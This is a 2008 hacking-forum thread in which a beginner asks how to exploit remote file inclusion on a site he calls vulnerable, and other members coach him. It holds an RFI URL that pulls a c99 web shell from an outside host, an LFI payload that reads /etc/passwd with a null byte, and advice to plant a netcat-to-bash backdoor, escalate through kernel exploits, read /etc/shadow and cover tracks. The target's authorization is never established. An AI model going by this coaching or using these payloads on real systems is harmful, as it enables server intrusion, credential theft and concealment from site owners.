|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 41
Members: 0
Total: 41
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
noobish post. :D |
|
Posted: Tue Aug 05, 2008 10:40 am |
|
|
sol1dzer0 |
Regular user |
|
|
Joined: Jan 21, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
so i have some questions..
1. first one is about Rfi if i have found Rfi vuln site [atleast i tihnk so] what should i dot next ?!
i have made host and uploaded c99 in it.. and did something like this..
www.vulnsyte.com/index.php?page=http://www.myhost.com/c99.php
but seems nothing happens.. -.-' ! for Rfi there is not many tuts what i have found -.- so im total newB to this.. !
* what is moust common errors which lead to Rfi ?! it would be nice if u could show me exmples like in sql inj. ''You have error in your sql syntax''
* what is ussual next step on Rfi ?! always upload some shell / script or something ?! i dont kinda get it.. ;/
*what should i know to undertstand better Rfi ? 0_o mby someone got some good tutoirals about this ?! [what i know i need to know all about victim ex. what OS is running is there php html. or fp running ect.]
2. Rooting.. hmm yea.. totla 0 for me.. would be nice if i get redir. on some good tutorial.. something like Rooting for n00bs !! what it is what can i do with it.. ex.
so i hope i get some help with this.. !
thankyou.
|
|
|
|
|
|
|
|
|
Posted: Tue Aug 05, 2008 11:09 am |
|
|
lenny |
Valuable expert |
|
|
Joined: May 15, 2008 |
Posts: 275 |
|
|
|
|
|
|
|
Well are you sure the page is vulnerable to RFI? index.php may have a set of filters to strip out the ":" of "http://", or in fact any URL altogether. Their host may also be set up to disable URL based includes (which is quite common). I believe that URL based includes are OFF in php.ini by default. Those could be your two main problems with your attack currently!
If you do manage to get an include, be sure to upload a shell - just keep it simple. Don't leave files on their server that are unnecessary, or you will arouse their suspicions. My usual approach (strictly lab based attacks, and for pen testing) is to start a netcat instance on their server forwarding to bash - essentially it allows me shell access in a more convinent environment than through a php script! From your makeshift ssh server, you can get to work looking at other expoits, for example in the kernel. Be sure to cover your tracks!
I suppose all that is pretty confusing, so ask away your questions - im here all week |
|
|
|
|
|
|
|
|
Posted: Tue Aug 05, 2008 11:58 am |
|
|
oniric |
Advanced user |
|
|
Joined: Jul 24, 2008 |
Posts: 65 |
|
|
|
|
|
|
|
A rooting paper would be usefull for me too ^_^
Probably PHP is configured to not allow remote file inclusion through HTTP or other net protocols. It's very very common nowadays like lenny said. Such vulns come from code like this:
include "../my/path/.".$_GET['page'].".php";
In such situations you could exploit this to load files that are out of the htdocs folder of the webserver. And you can load file with other extensions beside .php that is automatically added by the code adding a NULL byte to you request like so
http://vulnsite.com/index.php?page=../../etc/passwd%00
That's only an example, also probably you need to urlencode slashes. Please note the use of ../ to traverse file system backward.
Yes, better if you know the victim OS so you can easily locate files on the file system. Just play with paths and directory traversal looking for known file locations like /etc/passwd on linux systems. When you have such information you can start harvesting other usefull information from other files and maybe if the server is running as root opening /etc/shadow file |
|
|
|
|
|
|
|
|
Posted: Tue Aug 05, 2008 12:43 pm |
|
|
sol1dzer0 |
Regular user |
|
|
Joined: Jan 21, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
Thank u guys hmm bit hard to understand this but i will try to learn ;] this is not so easy as SQL injection lol but i thought the same about sql inject. when i didnt know anythin.. ;] ! tnx in advice.. if u two or anybody got something more to say plzz reply ;]
more info = better succes |
|
|
|
|
Posted: Tue Aug 05, 2008 1:06 pm |
|
|
oniric |
Advanced user |
|
|
Joined: Jul 24, 2008 |
Posts: 65 |
|
|
|
|
|
|
|
Mmm, I think sqli is far more difficult ^_^ You need to know SQL, not always but in many cases.
One thing more: NULL Byte, %00, works because it's the urlencoded version of \0, the C,C++ NULL Byte also known as the string terminator. So if the string sequence is
mystring%00isasd
php would "see" only mystring. |
|
|
|
|
Posted: Tue Aug 05, 2008 1:13 pm |
|
|
sol1dzer0 |
Regular user |
|
|
Joined: Jan 21, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
oniric wrote: | Mmm, I think sqli is far more difficult ^_^ You need to know SQL, not always but in many cases.
One thing more: NULL Byte, %00, works because it's the urlencoded version of \0, the C,C++ NULL Byte also known as the string terminator. So if the string sequence is
mystring%00isasd
php would "see" only mystring. |
noot sql inj is much more easy than this ;] ! i can pm good tuts on it if u need them xDD !! ;] %00 k will keep that in mind |
|
|
|
|
Posted: Tue Aug 05, 2008 1:18 pm |
|
|
oniric |
Advanced user |
|
|
Joined: Jul 24, 2008 |
Posts: 65 |
|
|
|
|
|
|
|
Ah no, thx, SQLi it's my field ^_^ I really like it, and exploiting it it's such fun |
|
|
|
|
Posted: Tue Aug 05, 2008 1:23 pm |
|
|
lenny |
Valuable expert |
|
|
Joined: May 15, 2008 |
Posts: 275 |
|
|
|
|
|
|
|
I try and stay away form SQL injection I really dislike it! I prefer somthing more solid, and that includes social engineering! It is a valid form of hacking, and it has served me well (and solidly) on many occasions!
Anyway, do you need any more information? or should that suffice for now? Keep us informed, we can always help out if you need further assistance! |
|
|
|
|
Posted: Tue Aug 05, 2008 2:02 pm |
|
|
sol1dzer0 |
Regular user |
|
|
Joined: Jan 21, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
yea somebody likes sql and somebody dislikes it ! ;]
and about Rfi right now it's ok will try to read some more stuff and learn more ;] ! mby someone in IRC will help me ;D
btw i cannot connect to this site irc channel.. plugin missing and i cannot download it.. -.-' damn.. wantedt to talk with you guys !!
anyway thankyou u all !! you are kind ppl ! |
|
|
|
|
Posted: Tue Aug 05, 2008 2:15 pm |
|
|
oniric |
Advanced user |
|
|
Joined: Jul 24, 2008 |
Posts: 65 |
|
|
|
|
|
|
|
Or LFI, more common Probably your best bet, as I and lenny said RFI in PHP is no longer so common. There's a setting in php.ini, called allow_url_fopen, that's commonly set to Off. And also if the code it's like
include "somethinghere".$_GET['page'];
you can't overwrite the somethinghere part so you can't call external http files in such a case ( very common ). |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|